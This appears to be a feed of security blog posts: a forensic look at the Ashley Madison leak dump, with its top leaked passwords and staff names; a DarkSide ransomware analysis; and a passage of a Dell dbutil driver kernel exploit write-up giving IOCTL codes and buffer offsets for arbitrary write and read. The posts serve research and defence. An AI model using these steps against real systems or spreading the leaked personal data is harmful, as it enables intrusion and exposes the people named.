    A “pwdump” style export of 1324 user accounts which appear to be from the ALM domain controller. These passwords will be easy to crack as NTLM hashes aren’t the strongest.
  • ALM Floor Plan – ports and names.pdf
    Seating map of main office, this type of map is usually used for network deployment purposes.
  • ARPU and ARPPU.docx
    A listing of SQL commands which provide revenue and other macro financial health info.
    Presumably these queries would run on the primary DB or a biz intel slave.
  • Credit useage.docx
    SQL queries to investigate credit card purchases.
  • Avid Org Chart 2015 – May 14.pdf
    A per-team organizational chart of what appears to be the entire company.
  • announcement.png
    The graphic created by Impact Team to announce their demand for ALM to shut down it’s flagship website AM.
  • [email protected]_20101103_133855.pdf
    Contract outlining the terms of a purchase of the biz Seekingarrangement.com
  • CSF Questionnaire (Responses).xlsx
    Company exec Critical Success Factors spreadsheet. Answering questions like “In what area would you hate to see something go wrong?” and the CTO’s response is about hacking.
  • ALM – January 2015 – Company Overview.pptx
    This is a very detailed breakdown of current biz health, marketing spend, and future product plans.
  • Ashley Madison Technology Stack v5(1).docx
    A detailed walk-through of all major servers and services used in the ALM production environment.
  • oneperday.txt
  • oneperday_am_am_member.txt
  • oneperday_aminno_member.txt
    These three files have limited leak info as a “teaser” for the .dump files that are found in the highest level directory of the AM leak.
  • Rev from organic search traffic.docx
    SQL queries to explore the revenue generated from search traffic.
  • 20131002-domain-list.xlsx
    BA list of the 1083 domain names that are, have been, or are seeking to be owned by ALM.
  • Sales Queries/
    Empty Directory
  • ALM Labs Inc. Articles of Incorporation.pdf
    The full 109 page Articles of Incorporation, ever aspect of inital company formation.
  • ALM – Corporate Chart.pptx
    A detailed block diagram defining the relationship between various tax and legal business entity names related to ALM businesses.
  • Avid Life Media – Major Shareholders.xlsx
    A listing of each major shareholder and their equity stake

———–[File meta-data analysis]

First we’ll take a look at the 7zip file in the top level directory.

$ 7z l ashleymadisondump.7z

Listing archive: ashleymadisondump.7z

----

Path = ashleymadisondump.7z

Type = 7z

Method = LZM

Solid = +

Blocks = 1

Physical Size = 37796243

Headers Size = 1303



   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2015-07-09 12:25:48 ....A     17271957     37794940  swappernet_User_Table.7z
2015-07-10 12:14:35 ....A       723516               announcement.png
2015-07-01 18:03:56 ....A        51222               ALMCLUSTER (production domain) computers.txt
2015-07-01 17:58:55 ....A       120377               ALMCLUSTER (production domain) hashdump.txt
2015-06-25 22:59:22 ....A        35847               AVIDLIFEMEDIA (primary corporate domain) computers.txt
2015-06-14 21:18:11 ....A       339221               AVIDLIFEMEDIA (primary corporate domain) user information and hashes.txt
2015-07-18 15:23:34 ....A       686533               oneperday.txt
2015-07-18 15:20:43 ....A       959099               oneperday_aminno_member.txt
2015-07-18 19:00:45 ....A      1485289               oneperday_am_am_member.txt
2015-07-19 17:01:11 ....A         6031               README.txt
2015-07-07 11:41:36 ....A         6042               Areas of concern - customer data.docx
2015-07-07 12:14:42 ....A         5907               Sales Queries/ARPU and ARPPU.docx
2015-07-07 12:04:35 ....A       960553               Ashley Madison Technology Stack v5(1).docx
2015-07-07 12:14:42 ....A         5468               Sales Queries/Credit useage.docx
2015-07-07 12:14:43 ....A         5140               Sales Queries/Number of traveling man purchases.docx
2015-07-07 12:14:47 ....A         5489               Sales Queries/Rebill Success Rate Queries.docx
2015-07-07 12:14:43 ....A         5624               Sales Queries/Rev by traffic source rebill broken out.docx
2015-07-07 12:14:42 ....A         6198               Sales Queries/Rev from organic search traffic.docx
2015-07-08 23:17:19 ....A       259565               ALM Floor Plan - ports and names.pdf
2012-10-19 16:54:20 ....A      1794354               ALM Labs Inc. Articles of Incorporation.pdf
2015-07-07 12:04:10 ....A      1766350               Avid Org Chart 2015 - May 14.pdf
2012-10-20 12:23:11 ....A      6344792               Copies of Option Agreements.pdf
2013-09-18 14:39:25 ....A       132798               Noel's loan agreement.pdf
2015-07-07 10:16:54 ....A       380043               [email protected]_20101103_133855.pdf
2012-12-13 15:26:58 ....A        67816               ALM - Corporate Chart.pptx
2015-07-07 12:14:28 ....A      8366232               ALM - January 2015 - Company Overview.pptx
2013-10-07 10:30:28 ....A        67763               20131002-domain-list.xlsx
2013-07-15 15:20:14 ....A        13934               Avid Life Media - Major Shareholders.xlsx
2015-07-09 11:57:58 ....A        22226               Banks.xlsx
2015-07-07 11:41:41 ....A        15703               CSF Questionnaire (Responses).xlsx
2015-07-09 11:57:58 ....A        42511               paypal accounts.xlsx
2015-07-07 12:04:44 ....A        15293               q2 2013 summary compensation detail_managerinput_trevor-s team.xlsx
2015-07-18 13:54:40 D....            0            0  Sales Queries
------------------- ----- ------------ ------------  ------------------------
                              41968893     37794940  32 files, 1 folders

If we’re to believe this meta-data, the newest file is from July 19th 2015 and the oldest is from October 19th 2012. The timestamp for the file announcement.png shows a creation date of July 10th 2015. This file is the graphical announcement from the leakers. The file swappernet_User_Table.7z
has a timestamp of July 9th 2015. Since this file is a database dump, one might presume that these files were created for the original release and the other files were copied from a file-system that preserves timestamps.

Within that 7zip file we’ve found another which looks like:

$ 7z l ashleymadisondump/swappernet_User_Table.7z

Listing archive: ./swappernet_User_Table.7z

----

Path = ./swappernet_User_Table.7z

Type = 7z

Method = LZMA

Solid = -

Blocks = 1

Physical Size = 17271957

Headers Size = 158




   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2015-06-27 18:39:40 ....A     61064200     17271799  swappernet_QA_User_Table.txt
------------------- ----- ------------ ------------  ------------------------
                              61064200     17271799  1 files, 0 folders

Within the ashleymadisondump directory extracted from ashleymadisondump.7z we’ve got
the following file types that we’ll examine for meta-data:

8 txt
8 docx
6 xlsx
6 pdf
2 pptx
1 png
1 7z

The PNG didn’t seem to have any EXIF meta-data, and we’ve already covered the 7z file.

The text files probably don’t usually yield anything to us meta-data wise.

In the MS Word docx files  we have the following meta-data:

  • Areas of concern – customer data.docx
    No Metadata
  • ARPU and ARPPU.docx
    No Metadata
  • Ashley Madison Technology Stack v5(1).docx
    Created Michael Morris, created and last modified on Sep 17 2013.
  • Credit useage.docx
    No Metadata
  • Number of traveling man purchases.docx
    No Metadata
  • Rebill Success Rate Queries.docx
    No Metadata
  • Rev by traffic source rebill broken out.docx
    No Metadata
  • Rev from organic search traffic.docx
    No Metadata

In the MS Powerpoint pptx files we have the following meta-data:

  • ALM – Corporate Chart.pptx
    Created by “Diana Horvat” on Dec 5 2012 and last updated by “Tatiana Kresling”
    on Dec 13th 2012
  • ALM – January 2015 – Company Overview.pptx
    Created Rizwan Jiwan, Jan 21 2011 and last modified on Jan 20 2015.

In the MS Excel xlsx files we have the following meta-data:

  • 20131002-domain-list.xlsx
    Written by Kevin McCall, created and last modified Oct 2nd 2013
  • Avid Life Media – Major Shareholders.xlsx
    Jamal Yehia, created and last modified July 15th 2013
  • Banks.xlsx
    Created by “Elena” and Keith Lalonde, created Dec 15 2009 and last modified Feb 26th  2010
  • CSF Questionnaire (Responses).xlsx
    No Metadata
  • paypal accounts.xlsx
    Created by Keith Lalonde, created Oct 28  2010 and last modified Dec 22nd  2010
  • q2 2013 summary compensation detail_managerinput_trevor-s team.xlsx
    No Metadata

And finally within the PDF files we also see additional meta-data:

  • ALM Floor Plan – ports and names.pdf
    Written by Martin Price in MS Visio, created and last modified April 23 2015
  • ALM Labs Inc. Articles of Incorporation.pdf
    Created with DocsCorp Pty Ltd (www.docscorp.com), created and last modified on Oct 17 2012
  • Avid Org Chart 2015 – May 14.pdf
    Created and last modified on May 14 2015
  • Copies of Option Agreements.pdf
    OmniPage CSDK 16 OcrToolkit, created and last modified on Oct 16 2012
  • Noel’s loan agreement.pdf
    Created and last modified on Sep 18 2013
  • [email protected]_20101103_133855.pdf
    Created and last modified on Jul 7 2015

———–[MySQL Dump file loading and evidence gathering]

At this point all of the dump files have been decompressed with gunzip or 7zip. The dump files are standard MySQL backup file (aka Dump files) the info in the dump files implies that it was taken from multiple servers:

$ grep 'MySQL dump' *.dump
am_am.dump:-- MySQL dump 10.13  Distrib 5.5.33, for Linux (x86_64)
aminno_member.dump:-- MySQL dump 10.13  Distrib 5.5.40-36.1, for Linux (x86_64)
aminno_member_email.dump:-- MySQL dump 10.13  Distrib 5.5.40-36.1, for Linux (x86_64)
member_details.dump:-- MySQL dump 10.13  Distrib 5.5.40-36.1, for Linux (x86_64)
member_login.dump:-- MySQL dump 10.13  Distrib 5.5.40-36.1, for Linux (x86_64)

Also within the dump files was info referencing being executed from localhost, this implies an attacker was on the Database server in question.

Of course, all of this info is just text and can easily be faked, but it’s interesting none-the-less considering the possibility that it might be correct and unaltered.

To load up the MySQL dumps we’ll start with a fresh MySQL database instance
on a decently powerful server and run the following commands:

--As root MySQL user
CREATE DATABASE aminno;
CREATE DATABASE am;
CREATE USER 'am'@'localhost' IDENTIFIED BY 'loyaltyandfidelity';
GRANT ALL PRIVILEGES ON aminno.* TO 'am'@'localhost';
GRANT ALL PRIVILEGES ON am.* TO 'am'@'localhost';

Now back at the command line we’ll execute these to import the main dumps:

$ mysql -D aminno -uam -ployaltyandfidelity < aminno_member.dump

$ mysql -D aminno -uam -ployaltyandfidelity < aminno_member_email.dump

$ mysql -D aminno -uam -ployaltyandfidelity < member_details.dump

$ mysql -D aminno -uam -ployaltyandfidelity < member_login.dump

$ mysql -D am -uam -ployaltyandfidelity < am_am.dump

Now that you’ve got the data loaded up you can recreate some of the findings ksugihara made with his analysis here [Edit: It appears ksugihara has taken this offline, I don’t have a mirror]. We didn’t have much more to add for holistic statistics analysis than what he’s already done so check out his blog post for more on the primary data dumps. There still is one last final database export though…

Within the file ashleymadisondump/swappernet_QA_User_Table.txt we have a final database export, but this one is not in the MySQL dump format. It is instead in CSV format. The file name implies this was an export from a QA Database server.

This file has the following columns (left to right in the CSV):

  • recid
  • id
  • username
  • userpassword
  • refnum
  • disable
  • ipaddress
  • lastlogin
  • lngstatus
  • strafl
  • ap43
  • txtCoupon
  • bot

Sadly within the file we see user passwords are in clear text which is always a bad security practice. At the moment though we don’t know if these are actual production user account passwords, and if so how old they are. My guess is that these are from an old QA server when AM was a smaller company and hadn’t moved to secure password hashing practices like bcrypt.

These commands show us there are 765,607 records in this database export and
only four of them have a blank password. Many of the passwords repeat and
397,974 of the passwords are unique.

$ cut -d , -f 4 < swappernet_QA_User_Table.txt |wc -l
765607
$ cut -d , -f 4 < swappernet_QA_User_Table.txt | sed '/^s*$/d' |wc -l
765603
$ cut -d , -f 4 < swappernet_QA_User_Table.txt | sed '/^s*$/d' |sort -u |wc -l
387974

Next we see the top 25 most frequently used passwords in this database export
using the command:

$ cut -d , -f 4 < swappernet_QA_User_Table.txt |sort|uniq -c |sort -rn|head -25
   5882 123456
   2406 password
    950 pussy
    948 12345
    943 696969
    917 12345678
    902 fuckme
    896 123456789
    818 qwerty
    746 1234
    734 baseball
    710 harley
    699 swapper
    688 swinger
    647 football
    645 fuckyou
    641 111111
    538 swingers
    482 mustang
    482 abc123
    445 asshole
    431 soccer
    421 654321
    414 1111
    408 hunter

After importing the CSV into MS excel we can use sort and filter to make some
additional statements based on the data.

    1. The only logins marked as “lastlogin” column in the year 2015 are from the
      following users:
      SIMTEST101
      SIMTEST130
      JULITEST2
      JULITEST3
      swappernetwork
      JULITEST4
      HEATSEEKERS
    1. The final and most recent login was from AvidLifeMedia’s office IP range.
    2. 275,285 of these users have an entry for the txtCupon.
    3. All users with the “bot” column set to TRUE have either passwords

“statueofliberty” or “cake”

The post A light-weight forensic analysis of the AshleyMadison Hack appeared first on Include Security Research Blog.

DarkSide Ransomware Victims Sold Short

14 May 2021 at 10:32
How to check for viruses

Over the past week we have seen a considerable body of work focusing on DarkSide, the ransomware responsible for the recent gas pipeline shutdown. Many of the excellent technical write-ups will detail how it operates an affiliate model that supports others to be involved within the ransomware business model (in addition to the developers). While this may not be a new phenomenon, this model is actively deployed by many groups with great effect. Herein is the crux of the challenge: while the attention may be on DarkSide ransomware, the harsh reality is that equal concern should be placed at Ryuk, or REVIL, or Babuk, or Cuba, etc. These, and other groups and their affiliates, exploit common entry vectors and, in many cases, the tools we see being used to move within an environment are the same. While this technical paper covers DarkSide in more detail, we must stress the importance of implementing best practices in securing/monitoring your network. These additional publications can guide you in doing so:

DarkSide Ransomware:  What is it?

As mentioned earlier, DarkSide is a Ransomware-as-a-Service (RaaS) that offers high returns for penetration-testers that are willing to provide access to networks and distribute/execute the ransomware. DarkSide is an example of a RaaS whereby they actively invest in development of the code, affiliates, and new features. Alongside their threat to leak data, they have a separate option for recovery companies to negotiate, are willing to engage with the media, and are willing to carry out a Distributed Denial of Service (DDoS) attack against victims. Those victims who do pay a ransom receive an alert from DarkSide on companies that are on the stock exchange who are breached, in return for their payment. Potential legal issues abound, not to mention ethical concerns, but this information could certainly provide an advantage in short selling when the news breaks.

The group behind DarkSide are also particularly active. Using MVISION Insights we can identify the prevalence of targets. This map clearly illustrates that the most targeted geography is clearly the United States (at the time of writing). Further, the sectors primarily targeted are Legal Services, Wholesale, and Manufacturing, followed by the Oil, Gas and Chemical sectors.

Coverage and Protection Advice

McAfee’s market leading EPP solution covers DarkSide ransomware with an array of early prevention and detection techniques.

Customers using MVISION Insights will find a threat-profile on this ransomware family that is updated when new and relevant information becomes available.

Early Detection

MVISION EDR includes detections on many of the behaviors used in the attack including privilege escalation, malicious PowerShell and CobaltStrike beacons, and visibility of discovery commands, command and control, and other tactics along the attack chain. We have EDR telemetry indicating early detection before the detonation of the Ransomware payload.

Prevention

ENS TP provides coverage against known indicators in the latest signature set. Updates on new indicators are pushed through GTI.

ENS ATP provides behavioral content focusing on proactively detecting the threat while also delivering known IoCs for both online and offline detections.

ENS ATP adds two (2) additional layers of protection thanks to JTI rules that provide attack surface reduction for generic ransomware behaviors and RealProtect (static and dynamic) with ML models targeting ransomware threats.

For the latest mitigation guidance, please review:

https://kc.mcafee.com/corporate/index?page=content&id=KB93354&locale=en_US

Technical Analysis

The RaaS platform offers the affiliate the option to build either a Windows or Unix version of the ransomware. Depending on what is needed, we observe that affiliates are using different techniques to circumvent detection, by masquerading the generated Windows binaries of DarkSide. Using several packers or signing the binary with a certificate are some of the techniques used to do so.

As peers in our industry have described, we also observed campaigns where the affiliates and their hacking crew used several ways to gain initial access to their victim’s network.

  1. Using valid accounts, exploit vulnerabilities on servers or RDP for initial stage
  2. Next, establish a beachhead in the victim’s network by using tools like Cobalt-Strike (beacons), RealVNC, RDP ported over TOR, Putty, AnyDesk and TeamViewer. TeamViewer is what we also see back in the config of the ransomware sample:

The configuration of the ransomware contains several options to enable or disable system processes, but also the above part where it states which processes should not be killed.

As mentioned before, a lot of the current Windows samples in the wild are the 1.8 version of DarkSide, others are the 2.1.2.3 version. In a chat one of the actors revealed that a V3 version will be released soon.

On March 23rd, 2021, on XSS, one of the DarkSide spokespersons announced an update of DarkSide as a PowerShell version and a major upgrade of the Linux variant:

In the current samples we observe, we do see the PowerShell component that is used to delete the Volume Shadow copies, for example.

  1. Once a strong foothold has been established, several tools are used by the actors to gain more privileges.

Tools observed:

  • Mimikatz
  • Dumping LSASS
  • IE/FireFox password dumper
  • Powertool64
  • Empire
  • Bypassing UAC
  1. Once enough privileges are gained, it is time to map out the network and identify the most critical systems like servers, storage, and other critical assets. A selection of the below tools was observed to have been used in several cases:
  • BloodHound
  • ADFind
  • ADRecon
  • IP scan tools
  • Several Windows native tools
  • PowerShell scripts

Before distributing the ransomware around the network using tools like PsExec and PowerShell, data was exfiltrated to Cloud Services that would later be used on the DarkSide Leak page for extortion purposes. Zipping the data, using Rclone or WinSCP are some of the examples observed.

While a lot of good and in-depth analyses are written by our peers, one thing worth noting is that when running DarkSide, the encryption process is fast. It is one of the areas the actors brag about on the same forum and do a comparison to convince affiliates to join their program:

DarkSide, like Babuk ransomware, has a Linux version. Both target *nix systems but in particular VMWare ESXi servers and storage/NAS. Storage/NAS is critical for many companies, but how many of you are running a virtual desktop, hosted on a ESXi server?

Darkside wrote a Linux variant that supports the encryption of ESXI server versions 5.0 – 7.1 as well as NAS technology from Synology. They state that other NAS/backup technologies will be supported soon.

In the code we clearly observe this support:

Also, the configuration of the Linux version shows it is clearly looking for Virtual Disk/memory kind of files:

Although the adversary recently claimed to vote for targets, the attacks are ongoing with packed and signed samples observed as recently as today (May 12, 2021):

Conclusion

Recently the Ransomware Task Force, a partnership McAfee is proud to be a part of, released a detailed paper on how ransomware attacks are occurring and how countermeasures should be taken. As many of us have published, presented on, and released research upon, it is time to act. Please follow the links included within this blog to apply the broader advice about applying available protection and detection in your environment against such attacks.

MITRE ATT&CK Techniques Leveraged by DarkSide:

Data Encrypted for Impact – T1486

Inhibit System Recovery – T1490

Valid Accounts – T1078

PowerShell – T1059.001

Service Execution – T1569.002

Account Manipulation – T1098

Dynamic-link Library Injection – T1055.001

Account Discovery – T1087

Bypass User Access Control – T1548.002

File Permissions Modification – T1222

System Information Discovery – T1082

Process Discovery – T1057

Screen Capture – T1113

Compile After Delivery – T1027.004

Credentials in Registry – T1552.002

Obfuscated Files or Information – T1027

Shared Modules – T1129

Windows Management Instrumentation – T1047

Exploit Public-Facing Application – T1190

Phishing – T1566

External Remote Services – T1133

Multi-hop Proxy – T1090.003

Exploitation for Privilege Escalation – T1068

Application Layer Protocol – T1071

Bypass User Account Control – T1548.002

Commonly Used Port – T1043

Compile After Delivery – T1500

Credentials from Password Stores – T1555

Credentials from Web Browsers – T1555.003

Credentials in Registry – T1214

Deobfuscate/Decode Files or Information – T1140

Disable or Modify Tools – T1562.001

Domain Account – T1087.002

Domain Groups – T1069.002

Domain Trust Discovery – T1482

Exfiltration Over Alternative Protocol – T1048

Exfiltration to Cloud Storage – T1567.002

File and Directory Discovery – T1083

Gather Victim Network Information – T1590

Ingress Tool Transfer – T1105

Linux and Mac File and Directory Permissions Modification – T1222.002

Masquerading – T1036

Process Injection – T1055

Remote System Discovery – T1018

Scheduled Task/Job – T1053

Service Stop – T1489

System Network Configuration Discovery – T1016

System Services – T1569

Taint Shared Content – T1080

Unix Shell – T1059.004

The post DarkSide Ransomware Victims Sold Short appeared first on McAfee Blog.

Bring Your Own VM - Mac Edition

28 December 2020 at 10:53
For a while I've wanted to explore the concept of leveraging a virtual machine on target during an engagement. The thought of having implant logic self-contained and running under a different OS to the base seems pretty interesting. But more so, I've been curious as to just how far traditional AV and EDR can go to detect malicious activity when running from a different virtual environment. While this is a nice idea, the issues with creating this type of malware are obvious, with increased comple...

Exploit Development: CVE-2021-21551 - Dell ‘dbutil_2_3.sys’ Kernel Exploit Writeup

16 May 2021 at 00:00

Introduction

Recently I said I was going to focus on browser exploitation with Advanced Windows Exploitation being canceled. With this cancellation, I found myself craving a binary exploitation training, with AWE now being canceled for the previous two years. I found myself enrolled in HackSysTeam’s Windows Kernel Exploitation Advanced course, which will be taking place at the end of this month at CanSecWest, due to the cancellation. I have already delved into the basics of kernel exploitation, and I had been looking to complete a few exercises to prepare for the end of the month, and shake the rust off.

I stumbled across this SentinelOne blog post the other day, which outlined a few vulnerabilities in Dell’s dbutil_2_3.sys driver, including a memory corruption vulnerability. Although this vulnerability was attributed to Kasif Dekel, it apparently was discovered earlier by Yarden Shafir and Staoshi Tanda, coworkers of mine at CrowdStrike.

After reading Kasif’s blog post, which practically outlines the entire vulnerability and does an awesome job of explaining things and giving researchers a wonderful starting point, I decided that I would use this opportunity to get ready for Windows Kernel Exploitation Advanced at the end of the month.

I also decided, because Kasif leverages a data-only attack, instead of something like corrupting page table entries, that I would try to recreate this exploit by achieving a full SYSTEM shell via page table corruption. The final result ended up being a weaponized exploit. I wanted to take this blog post to showcase just a few of the “checks” that needed to be bypassed in the kernel in order to reach the final arbitrary read/write primitive, as well as why modern mitigations such as Virtualization-Based Security (VBS) and Hypervisor-Protected Code Integrity (HVCI) are so important in today’s threat landscape.

In addition, three of my favorite things to do are to write, conduct vulnerability research, and write code - so regardless of if you find this blog helpful/redundant, I just love to write blogs at the end of the day :-). I also hope this blog outlines, as I mentioned earlier, why it is important mitigations like VBS/HVCI become more mainstream and that at the end of the day, these two mitigations in tandem could have prevented this specific method of exploitation (note that other methods are still viable, such as a data-only attack as Kasif points out).

Arbitrary Write Primitive

I will not attempt to reinvent the wheel here, as Kasif’s blog post explains very well how this vulnerability arises, but the tl;dr on the vulnerability is there is an IOCTL code that any client can trigger with a call to DeviceIoControl that eventually reaches a memmove routine, in which the user-supplied buffer from the vulnerable IOCTL routine is used in this call.

Let’s get started with the analysis. As is accustom in kernel exploits, we first need a way, generally speaking, to interact with the driver. As such, the first step is to obtain a handle to the driver. Why is this? The driver is an object in kernel mode, and as we are in user mode, we need some intermediary way to interact with the driver. In order to do this, we need to look at how the DEVICE_OBJECT is created. A DEVICE_OBJECT generally has a symbolic link which references it, that allows clients to interact with the driver. This object is what clients interact with. We can use IDA in our case to locate the name of the symbolic link. The DriverEntry function is like a main() function in a kernel mode driver. Additionally, DriverEntry functions are prototyped to accept a pointer to a DRIVER_OBJECT, which is essentially a “representation” of a driver, and a RegistryPath. Looking at Microsoft documentation of a DRIVER_OBJECT, we can see one of the members of this structure is a pointer to a DEVICE_OBJECT.

Loading the driver in IDA, in the Functions window under Function name, you will see a function called DriverEntry.

This entry point function, as we can see, performs a jump to another function, sub_11008. Let’s examine this function in IDA.

As we can see, the \Device\DBUtil_2_3 string is used in the call to IoCreateDevice to create a DEVICE_OBJECT. For our purposes, the target symbolic link, since we are a user-mode client, will be \\\\.\\DBUtil_2_3.

Now that we know what the target symbolic link is, we then need to leverage CreateFile to obtain a handle to this driver.

We will start piecing the code together shortly, but this is how we obtain a handle to interact with the driver.

The next function we need to call is DeviceIoControl. This function will allow us to pass the handle to the driver as an argument, and allow us to send data to the driver. However, we know that drivers create I/O Control (IOCTL) routines that, based on client input, perform different actions. In this case, this driver exposes many IOCTL routines. One way to determine if a function in IDA contains IOCTL routines, although it isn’t fool proof, is looking for many branches of code with cmp eax, DWORD. IOCTL codes are DWORDs and drivers, especially enterprise grade drivers, will perform many different actions based on the IOCTL specified by the client. Since this driver doesn’t contain many functions, it is relatively trivial to locate a function which performs many of these validations.

Per Kasif’s research, the vulnerable IOCTL in this case is 0x9B0C1EC8. In this function, sub_11170, we can look for a cmp eax, 9B0C1EC8h instruction, which would be indicative that if the vulnerable IOCTL code is specified, whatever code branches out from that compare statement would lead us to the vulnerable code path.

This compare, if successful, jumps to an xor edx, edx instruction.

After the XOR instruction incurs, program execution hits the loc_113A2 routine, which performs a call to the function sub_15294.

If you recall from Kasif’s blog post, this is the function in which the vulnerable code resides in. We can see this in the function, by the call to memmove.

What primitive do we have here? As Kasif points out, we “can control the arguments to memmove” in this function. We know that we can hit this function, sub_15294, which contains the call to memmove. Let’s take a look at the prototype for memmove, as seen here.

As seen above, memmove allows you to move a pointer to a block of memory into another pointer to a block of memory. If we can control the arguments to memmove, this gives us a vanilla arbitrary write primitive. We will be able to overwrite any pointer in kernel mode with our own user-supplied buffer! This is great - but the question remains, we see there are tons of code branches in this driver. We need to make sure that from the time our IOCTL code is checked and we are directed towards our code path, that any compare statements/etc. that arise are successfully dealt with, so we can reach the final memmove routine. Let’s begin by sending an arbitrary QWORD to kernel mode.

After loading the driver on the debuggee machine, we can start a kernel-mode debugging session in WinDbg. After verifying the driver is loaded, we can use IDA to locate the offset to this function and then set a breakpoint on it.

Next, after running the POC on the debuggee machine, we can see execution hits the breakpoint successfully and the target instruction is currently in RIP and our target IOCTL is in the lower 32-bits of RAX, EAX.

After executing the cmp statement and the jump, we can see now that we have landed on the XOR instruction, per our static analysis with IDA earlier.

Then, execution hits the call to the function (sub+15294) which contains the memmove routine - so far so good!

We can see now we have landed inside of the function call, and a new stack frame is being created.

If we look in the RCX register currently, we can see our buffer, when dereferencing the value in RCX.

We then can see that, after stepping through the sup rsp, 0x40 stack allocation and the mov rbx, rcx instruction, the value 0x8 is going to be placed into ECX and used for the cmp ecx, 0x18 instruction.

What is this number? This is actually the size of our buffer, which is currently one QWORD. Obviously this compare statement will fail, and essentially an NTSTATUS code is returned back to the client of 0xC0000000D, which means STATUS_INVALID_PARAMETER. This is the driver’s way to let the client know one of the needed arguments wasn’t correct in the IOCTL call. This means that if we want to reach the memmove routine, we will at least need to send 0x18 bytes worth of data.

Refactoring our code, let’s try to send a contiguous buffer of 0x18 bytes of data.

After hitting the sub_5294 function, we see that this time the cmp ecx, 0x18 check will be bypassed.

After stepping through a few instructions, after the test rax, rax bitwise test and the jump instruction, we land on a load effective address instruction, and we can see our call to memmove, although there is no symbol in WinDbg.

Since we are about to hit the call to memmove, we know that the __fastcall calling convention is in use, as we see no movements to the stack and we are on a 64-bit system. Because of this, we know that, based on the prototype, the first argument will be placed into RCX, which will be the destination buffer (e.g. where the memory will be written to). We also know that RDX will contain the source buffer (e.g. where the memory comes from).

Stepping into the mov ecx, dword ptr[rsp+0x30], which will move the lower 32-bits of RSP, ESP, into ECX, we can see that a value of 0x00000000 is about to be moved into ECX.

We then see that the value on the stack, at an offset of 0x28, is added to the value in RCX, which is currently zero.

We then can see that invalid memory will be dereferenced in the call to memmove.

Why is this? Recall the prototype of memmove. This function accepts a pointer to memory. Since we passed raw values of junk, these addresses are invalid. Because of this, let’s switch up our POC a bit again in order to see if we can’t get a desired result. Let’s use KUSER_SHARD_DATA at an offset of 0x800, which is 0xFFFFF78000000800, as a proof of concept.

This time, per Kasif’s research, we will send a 0x20 byte buffer. Kasif points out that the memmove routine, before reaching the call, will select at an offset of 0x8 (the destination) and 0x18 (the source).

After re-executing the POC, let’s jump back right before the call to memmove.

We can see that this time, 0x42 bytes, 4 bytes of them to be exact, will be loaded into ECX.

Then, we can clearly see that the value at the stack, plus 0x28 bytes, will be added to ECX. The final result is 0xFFFFF78042424242.

We then can see that before the call, another part of our buffer is moved into RDX as the source buffer. This allows us an arbitrary write primitive! A buffer we control will overwrite the pointer at the memory address we supply.

The issue is, however, with the source address. We were attempting to target 0xFFFFF78000000800. However, our address got mangled into 0xFFFFF78042424242. This is because it seems like the lower 32-bits of one of our user-supplied QWORDS first gets added to the destination buffer. This time, if we resend the exploit and we change where 0x4242424242424242 once was with 0x0000000000000000, we can “bypass” this issue, but having a value of 0 added, meaning our target address will remain unmangled.

After sending the POC again, we can see that the correct target address is loaded into RCX.

Then, as expected, our arguments are supplied properly to the call to memmove.

After stepping over the function call, we can see that our arbitrary write primitive has successfully worked!

Again, thank you to Kasif for his research on this! Now, let’s talk about the arbitrary read primitive, which is very similar!

Arbitrary Read Primitive

As we know, whenever we supply arguments to the vulnerable memmove routine used for an arbitrary write primitive, we can supply the “what” (our data) and the “where” (where do we write the data). However, recall the image two images above, showcasing our successful arguments, that since memmove accepts two pointers, the argument in RDX, which is a pointer to 0x4343434343434343, is a kernel mode address. This means, at some point between the memmove call and our invocation of DeviceIoControl, our array of QWORDS was transferred to kernel mode, so it could be used by the driver in the call to memmove. Notice, however, that the target address, the value in RCX, is completely controllable by us - meaning the driver doesn’t create a pointer to that QWORD, we can directly supply it. And, since memmove will interpret that as a pointer, we can actually overwrite whatever we pass to the target buffer, which in this case is any address we want to corrupt.

What if, however, there was a way to do this in reverse? What if, in place of the kernel mode address that points to 0x4343434343434343 we could just supply our own memory address, instead of the driver creating a pointer to it, identically to how we control the target address we want to move memory to.

This means, instead of having something like this for the target address:

ffffc605`24e82998 43434343`43434343

What if we could just pass our own data as such:

43434343`43434343 DATA

Where 0x4343434343434343 is a value we supply, instead of having the kernel create a pointer to it for us. That way, when memmove interprets this address, it will interpret it as a pointer. This means that if we supply a memory address, whatever that memory address points to (e.g. nt!MiGetPteAddress+0x13 when dereferenced) is copied to the target buffer!

This could go one of two ways potentially: option one would be that we could copy this data into our own pointer in C. However, since we see that none of our user-mode addresses are making it to the driver, and the driver is taking our buffer and placing it in kernel mode before leveraging it, the better option, perhaps, would be to supply an output buffer to DeviceIoControl and see if the memmmove data writes it to the output buffer.

The latter option makes sense as this IOCTL allows any client to supply a buffer and have it copied. This driver most likely isn’t expecting unauthorized clients to this IOCTL, meaning the input and output buffers are most likely being used by other kernel mode components/legitimate user-mode clients that need an easy way to pass and receive data. Because of this, it is more than likely it is expected behavior for the output buffer to contain memmove data. The problem is we need to find another memmove routine that allows us to essentially to the inverse of what we did with the arbitrary write primitive.

Talking to a peer of mine, VoidSec about my thought process, he pointed me towards Metasploit, which already has this concept outlined in their POC.

Doing a bit more of reverse engineering, we can see that there is more than one way to reach the arbitrary write memmove routine.

Looking into the sub_15294, we can see that this is the same memmove routine leveraged before.

However, since there is another IOCTL routine that invokes this memmove routine, this is a prime candidate to see if anything about this routine is different (e.g. why create another routine to do the same thing twice? Perhaps this routine is used for something else, like reading memory or copying memory in a different way). Additionally, recall when we performed an arbitrary write, the routines were indexing our buffer at 0x8 and 0x18. This could mean that the call to memmove, via the new IOCTL, could setup our buffer in a way that the buffer is indexed at a different offset, meaning we may be able to achieve an arbitrary read.

It is possible to reach this routine through the IOCTL 0x9B0C1EC4.

Let’s update our POC to attempt to trigger the new IOCTL and see if anything is returned in the output buffer. Essentially, we will set the second value, similar to last time, of our QWORD array to the value we want to interact with, in this case, read, and set everything else to 0. Then, we will reuse the same array of QWORDS as an output buffer and see if anything was written to the buffer.

We can use IDA to identify the proper offset within the driver that the cmp eax, 0x9B0C1EC4 lands on, which is sub_11170+75.

We know that the first IOCTL code we will hit is the arbitrary write IOCTL, so we can pass over the first compare and then hit the second.

We then can see execution reaches the function housing the memmove routine, sub_15294.

After stepping through a few instruction, we can see our input buffer for the read primitive is being propagated and setup for the future call to memmove.

Then, the first part of the buffer is moved into RAX.

Then, the target address we would like to dereference and read from is loaded into RAX.

